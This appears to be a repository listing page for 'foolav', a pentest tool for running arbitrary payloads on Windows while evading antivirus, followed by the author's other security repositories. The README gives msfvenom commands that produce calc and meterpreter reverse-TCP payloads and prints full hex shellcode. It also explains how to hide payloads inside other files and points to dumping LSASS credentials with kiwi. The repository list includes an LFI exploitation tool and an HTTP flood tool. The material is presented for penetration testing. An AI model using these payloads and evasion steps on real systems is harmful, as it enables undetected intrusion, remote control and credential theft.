• Stars
    star
    175
  • Rank 213,390 (Top 5 %)
  • Language
    C
  • License
    MIT License
  • Created over 8 years ago
  • Updated about 8 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Pentest tool for antivirus evasion and running arbitrary payload on target Wintel host

foolav

Executable compiled with this code is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files: binary executable and payload file into the same directory.

Usage steps

  1. prepare your payload (x86), i.e.

    calc: msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you dont really need to use any encoder or characters blacklisting, it will work anyway)

    meterpreter: msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

  2. copy payload file [executable-name-without-exe-extension].mf in the same directory as executable payload running calc.exe generated using above command:

    # calc.exe
    \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84
    
  3. once executable is run, payload file will be parsed, loaded into separate thread and executed in memory:

    screen

Hints

  • x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64 processes. After that, load kiwi will load x86_64 version making it possible to access juicy contents of LSASS process memory :)

    meter

  • .mf payload file can be obfuscated - parser will ignore every character other than \xHH hexdecimal sequences. This means, it can append your payload to almost any file, hide it between the lines or even add your own comments, example:

obfuscation

Download

https://github.com/hvqzao/foolav/releases/download/v1.0/foolav.zip

License

MIT License

More Repositories

1

burp-wildcard

Burp extension intended to compact Burp extension tabs by hijacking them to own tab.
Java
127
star
2

liffy

Local File Inclusion Exploitation Tool (mirror)
Python
123
star
3

foolavc

foolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV
C
110
star
4

report-ng

Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
Python
65
star
5

burp-flow

Extension providing view with filtering capabilities for both complete and incomplete requests from all burp tools.
Java
46
star
6

java-deserialize-webapp

Vulnerable webapp testbed
Java
19
star
7

burp-token-rewrite

Burp extension for automated handling of CSRF tokens
Java
16
star
8

x

Pentest environment scaffolding. Supporting role in Kali Linux.
Java
12
star
9

ipport

Small subset of Bash and Python scripts which could be used for rapid network recon
Python
11
star
10

burp-second-order

Extension for semi-automated search for second order issues in webapps
Java
8
star
11

jgantt

jGantt plugin for Atlassian JIRA Kanban board
JavaScript
7
star
12

evadeav

AV evasion experiment (fail inspired by some blogpost)
C
6
star
13

sqli-testbed

SQL injection testbed designed for sqlmap practice (MySQL backend)
PHP
3
star
14

burp-negotiate

Kerberos / SPNEGO authentication for BurpSuite
Java
3
star
15

burp-csrf-handling

CSRF tokens handling Burp extension
Python
3
star
16

java-rmi

Example Java RMI client-server both with and without SSL support
Java
2
star
17

ve

Created to provide fast provisioning - automated download, build and set up Python or Node.JS virtual environments.
Shell
2
star
18

http-flood-netty

Trival HTTP Flood implementation based on Java Netty Framework
Java
1
star
19

ftcliserv

File Transfer Client-Server
Python
1
star
20

endec

Tiny utility to encrypt and decrypt text data using aes-256-cbc algorithm.
Python
1
star